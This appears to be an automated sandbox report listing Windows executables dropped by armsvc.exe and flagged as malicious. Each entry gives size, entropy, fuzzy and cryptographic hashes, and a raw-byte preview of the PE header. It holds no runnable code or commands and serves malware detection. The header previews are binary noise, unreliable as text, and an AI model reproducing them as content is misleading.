                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1495040
                                                                                                                                                                                                                            Entropy (8bit):4.965308218727557
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:AzNKU/5UGJ0eeQ2yPyzc+E7xonyVGc/dT5N:AzNr/5LJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:FA6541EBBF54000C91DD07B3F6A416D5
                                                                                                                                                                                                                            SHA1:C77FE80A22F8168159DF401D0CEDCC91011D2BD8
                                                                                                                                                                                                                            SHA-256:9343EC84067394113D20A17C64FEA79F555C69A2CC5D6DB4DA314C5F92C79528
                                                                                                                                                                                                                            SHA-512:8FFFEE96D00589CD79AF7ABE817EFF3B3FCA75866633C24C96B25C4EDD256B5858E2441C00023A1470ACB8E4CEBE94A58CF0CE09707487B4F34EC3CB2FBD5426
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................. ........... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5855744
                                                                                                                                                                                                                            Entropy (8bit):6.572240932947478
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:LALuzDKnxCp3JKCrPJzruaI6HMaJTtGb21vcbE7xQ2l:MaGg3cuPIaI6HMaJTtGb28m9
                                                                                                                                                                                                                            MD5:49381C9A646DAD39258BA032F53F7C5C
                                                                                                                                                                                                                            SHA1:64FABB9FF96764FCA7FC121210F0ED37C0B655FA
                                                                                                                                                                                                                            SHA-256:E7982A8033B1D01C8AB740A439266EB49A5B6207416C03B2E8AEEF613A92C54E
                                                                                                                                                                                                                            SHA-512:7E07112950A4DC43395D009F70C01A9D652913B7A9FD43432D20BDB9550AD2448600589D89EAD6EE52B2CAE0AA16A3F82929714CB8D3077169AA95E532E02330
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1419264
                                                                                                                                                                                                                            Entropy (8bit):5.026610245211874
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:7Xr/SVAxWxGJ0eeQ2yPyzc+E7xonyVGc/dT5N:PNxxJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:5231925D839C4D6788F3B7232C75C1A0
                                                                                                                                                                                                                            SHA1:E5AB4A5F4946C335CEA70C731384DD09155D3DDB
                                                                                                                                                                                                                            SHA-256:84BF0958D8156582DCE714F58148F9AC0C0840A42651C3D8D1A483ED0D6760DD
                                                                                                                                                                                                                            SHA-512:87C3ADB94E3053D5B8A3D01DAEEEE6A0E48247C093790AC72BEBF55973417ED67EE8E458062FAAACEACC57A27EA9627059CC3793777525A8A717C1FC56037F60
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@.............................................. ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):27533312
                                                                                                                                                                                                                            Entropy (8bit):6.248104479826709
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:196608:3hRrmpGpGdJM7Hbp8JfrCGvqTYuNDmoefAlprtPz25HqaI6HMaJTtGbQOi8m9:3hRCpGpMJMrbp8JjpWdNlc5gC
                                                                                                                                                                                                                            MD5:02E82CABD2B3C40DEC3C902B1687CF2F
                                                                                                                                                                                                                            SHA1:576FC475B52DAD4816E1B6931FA37DF41833B7C6
                                                                                                                                                                                                                            SHA-256:EE38EFE363ECC0E028377E2B74951F48E7B2B4666F29DC6904B834FE22CF5568
                                                                                                                                                                                                                            SHA-512:2DFA63711C63839F007EA35ABF1C6B6FB0F91CFC25903EE0204F54965BBC725B273DA142325E5F9DB2EF8833B13264432D06615E5A94BE17D430D42F57F1ECDC
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2199552
                                                                                                                                                                                                                            Entropy (8bit):6.782797070095846
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:f83pZ3kd0CuEeN0LUmRXbYs65mKJLeQVPyzc+E7xQ2l:nKuUMY15N1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:77CA222E531FB560A1868E3EE4D38482
                                                                                                                                                                                                                            SHA1:0A963D52F9B43C88DEA1B6A99C29DEBE6B531870
                                                                                                                                                                                                                            SHA-256:29C4BB79EED106BC2D7A53DAC81FDFDDBB03365951223C8C98EBB4F539577CF6
                                                                                                                                                                                                                            SHA-512:6D5B4B608D9B224955780B5EFA9ECD0F0E709BF1296B2125A6268465EFC1C8F08D003243D6F68AD82B98640E138CD39D3CD9C9C653A8CA3F188E55A70006EB2E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4971008
                                                                                                                                                                                                                            Entropy (8bit):6.668611104953452
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:RErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGO8ndOPcptz6+My:3A4oGlcR+glpdOPKzgVZc1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:CCDFF708DC0629D337FD7B943067AED1
                                                                                                                                                                                                                            SHA1:33F26CFCAA023214952C008B6D68EAB74649F95D
                                                                                                                                                                                                                            SHA-256:993E4E7318492CB96466E158DE3859BF445AB6825A038C46945D4EA6C4977127
                                                                                                                                                                                                                            SHA-512:C1234B33C33D7006AFCCEF46017C19C2BA782A94FD505E8AED1F08F56446F51A033A257A339E054140E4769ED8687EA2C628A5E64D7AB82EB20FC5846C196E59
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4897792
                                                                                                                                                                                                                            Entropy (8bit):6.8274355423687485
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:gv2gM+qwtLg7pPgw/DSZHa1vcbE7xQ2l:g+BRwpgKxa8m9
                                                                                                                                                                                                                            MD5:18BC9EB1048283A1DDE7CD5930400B95
                                                                                                                                                                                                                            SHA1:FF7CA432DC8425E83273E202561771057756347E
                                                                                                                                                                                                                            SHA-256:D5F831925FCACC7E6295CC1727FB4950BA6E859382E74AFD199CA2B92F6D51A8
                                                                                                                                                                                                                            SHA-512:AF3A2F87D4C6366537BB01E46CA008F158EF8B7ABB791A735B0BDF5EB558C49740ED870FC85E5617DCFB31CB84B6B77ACA42CC3C430567F5EE6BA51017B3B90B
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....D.K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4897792
                                                                                                                                                                                                                            Entropy (8bit):6.827442215140447
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:98304:mv2gM+qwtLg7pPgw/DSZHa1vcbE7xQ2l:m+BRwpgKxa8m9
                                                                                                                                                                                                                            MD5:43C0D894AC73C2037D01BEF372216ECE
                                                                                                                                                                                                                            SHA1:1D54BF8B83160B56C29B22AEB80DA76E64BD6449
                                                                                                                                                                                                                            SHA-256:779BC561A9C06F89401154F7A252D6A144EE96C2754F9E1C88097FEBC22BA29F
                                                                                                                                                                                                                            SHA-512:55FAD6487937C377241D4E2D61D4682C4F861522109A0E9D881A30423929EC67A11BAF18FF02DFFC4C7FE961554B95C32578CC33E3FDCE0A7831827D64EC2DC6
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....kFK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2156544
                                                                                                                                                                                                                            Entropy (8bit):6.947901059017023
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:DtjqL8fHv8aUbp8D/8+xyWAyGJ0eeQ2yPyzc+E7xonyVGc/dT5N:5jKKv81FI/8zXJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:2D6BADCF1C6C93EAC29AC58279E663C6
                                                                                                                                                                                                                            SHA1:09DDE9908FD39AFE326492A36382E4421094C90F
                                                                                                                                                                                                                            SHA-256:0788C326FB1A295897D6167DBDA16CAE70CF1D93BB4A8542B869E1F542CAE280
                                                                                                                                                                                                                            SHA-512:C9E25756F593F67D3DE172ED934002C1481895FF59A5F00B879DCD83F0ECC4A78A01B8EBFD7A881A010C4F218A2AABF7F5EC1D6668A0618F7F2A474B8BDD9999
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......D!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2370560
                                                                                                                                                                                                                            Entropy (8bit):7.027052516959069
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:xAMsOu3JfCIGcZuTodRFYKBrFDbWplJLeQVPyzc+E7xQ2l:xAMa3PZuTSc1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:65BC4C91EA79BC844AB873E127D7255A
                                                                                                                                                                                                                            SHA1:CC05F46059D731270A4E42446D14855D2E03738F
                                                                                                                                                                                                                            SHA-256:4CF9E1D8CAFF23500516D22E8F3731A7826CE62BED66166051E0D9550A100458
                                                                                                                                                                                                                            SHA-512:6DE77A17C621E4AC16825FA464C9A321D3798C813ACEA08C918557E997781248B4C9614063DABB2307F6F0033E3EEA6813B5A46D2059779CDD6447D0AC80B135
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.....r.%... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1984512
                                                                                                                                                                                                                            Entropy (8bit):7.097974720785373
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:CSK7Fhsly2EPfOGEIJLeQVPyzc+E7xQ2l:XU2cOI1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:6CEB2C4671B2A326AB1A74FF68044BF9
                                                                                                                                                                                                                            SHA1:36291904692965E246858EB62FC5A7390B643C98
                                                                                                                                                                                                                            SHA-256:FF264742F8CACE4684F3F5150348A6EF71972B5D8854B16F90197BB2BC411D0F
                                                                                                                                                                                                                            SHA-512:FAEC1DE240ACD38DE51CFAA5A519F964B2367EC796B5D806935C3FEE575CACF1E0BD002B53258F2004A6562DDE2247EB711B755F3B5E2E476E9F7A61F81A0AF7
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1779712
                                                                                                                                                                                                                            Entropy (8bit):7.15108358090093
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:Zv7e0j11mD+/wDGb+JLeQVPyzc+E7xQ2l:9Dx1mk+1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:FCC13EF71CEA6BC960710DB283E59EE6
                                                                                                                                                                                                                            SHA1:9C7EB69890429B67B2E75E307DA2EF1C26063F69
                                                                                                                                                                                                                            SHA-256:75E2DCE70C00EBD98028261C0DA0B1CD62101623F3C8889B5D531A15CE4CB3B0
                                                                                                                                                                                                                            SHA-512:4F961C48F4BE79FD38B970B6B43A10562B00F910918528F24EA2285938D7A758467478DF09D857F45742D842372E445BCF68A4AF7A5A27012FD360BF7EFF809D
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.....................................d.... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1484800
                                                                                                                                                                                                                            Entropy (8bit):5.064029755404418
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:WKhSrGJ0eeQ2yPyzc+E7xonyVGc/dT5N:W8JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:7C47D0273AF9846033980BCA9D08D995
                                                                                                                                                                                                                            SHA1:F1AE9F2EB3B06A0D66A8BB3A999EC9F48ED17FF9
                                                                                                                                                                                                                            SHA-256:80C5BF3C76FEE832FFE037879C902EC9313BFAF130FE0093C06F7AAD5CA4A53D
                                                                                                                                                                                                                            SHA-512:76CDD461522C0F4E37908CB17E7FC1C6217CB19F0EA99E6E3FA5F8354EBE550C04FA3865175D98EA395FBD6F9272FAEC26800FBC4BCE606C38461CE8ABA1C008
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@..............................!.....R..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1286656
                                                                                                                                                                                                                            Entropy (8bit):7.214633333888657
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:4sFfc1VyFnTUQn652bO4HGGJ0eeQ2yPyzc+E7xonyVGc/dT5N:4sFcInTrJDJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:8F2D077017D9CA7203318CEBD4A0F464
                                                                                                                                                                                                                            SHA1:1E61F08A40E1421AEAEF593284E9AD4450D833C5
                                                                                                                                                                                                                            SHA-256:057DFEF2E0DE08822F7E513C41666C28052794EF24F8F1B2AD4BB508B6BFD923
                                                                                                                                                                                                                            SHA-512:803D72F9A66B86BCAC6CA41F5071A85272341347D1D9001375E457C1AADD3CB3407A4AA159117E955E1C0C649200B3DCD485B6A1FD5798AE4F47ACCC7B0AB2AF
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................mC.... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1246208
                                                                                                                                                                                                                            Entropy (8bit):7.486118538012391
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:ft9j6p4xQbiKI69wpemIwpel9nGJ0eeQ2yPyzc+E7xonyVGc/dT5N:ft9+aQbtl2peapelwJLeQVPyzc+E7xQW
                                                                                                                                                                                                                            MD5:FF41DFD0AF994C778FFC1CD4F68C9B3C
                                                                                                                                                                                                                            SHA1:3D8C67214CE456B3F938F6260DC37F5E32244E46
                                                                                                                                                                                                                            SHA-256:463557A5074BE727F58D59C0D348B80FE2479C7B308241632C19ED569B080AA6
                                                                                                                                                                                                                            SHA-512:A2302359E275DADBF33B7CAEF054712F45C99BE14F2A39EF2571C33A6E25AD5782BF822A9856C57BF6B27645CE960AC674CFA2EE8A35CC33526C5FF30E4125A9
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................M..... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1463296
                                                                                                                                                                                                                            Entropy (8bit):5.030513620468314
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:GQVTZu0J+GJ0eeQ2yPyzc+E7xonyVGc/dT5N:NVTZuAJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:80A15CCF6E8344146DED48870C1C1B51
                                                                                                                                                                                                                            SHA1:34ABF0DEACACF45D79DBE4F3714EF73DDB3422F1
                                                                                                                                                                                                                            SHA-256:14080881B1B8963E294A8F405ABD1AEEACD148493BDAAC61517280F6405D002E
                                                                                                                                                                                                                            SHA-512:DB8B472DB405A2E7AB2F6DFD3F84EE3CC52A6E86918DE3AF4EBC32412F9387FC5077A0B348502F0F8B9B55E1839F17B4E3452B024A70A327632B35E2409545F7
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................. ........... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...............t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1344000
                                                                                                                                                                                                                            Entropy (8bit):6.800599645761557
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:+C1vpgXcZ/zMGJ0eeQ2yPyzc+E7xonyVGc/dT5N:+C1vpIc9TJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:F974EF386BFD4FA69085CF5CE590C086
                                                                                                                                                                                                                            SHA1:DDDA0545052B4EB748869610B5FE890779D7D4A5
                                                                                                                                                                                                                            SHA-256:82754544C59B4F99D449F8AE71BD5FBAF492774A15389473755A5C7872BC59D7
                                                                                                                                                                                                                            SHA-512:4A0C7A6199FCC3D26914FAC9C9F7918FD6760FC7BC492CF545A17CFD84E469FFE25C328F575498F1792EE7DCD1854DC4F4540994695EDCF4B53ABD9BD0AB1BBF
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
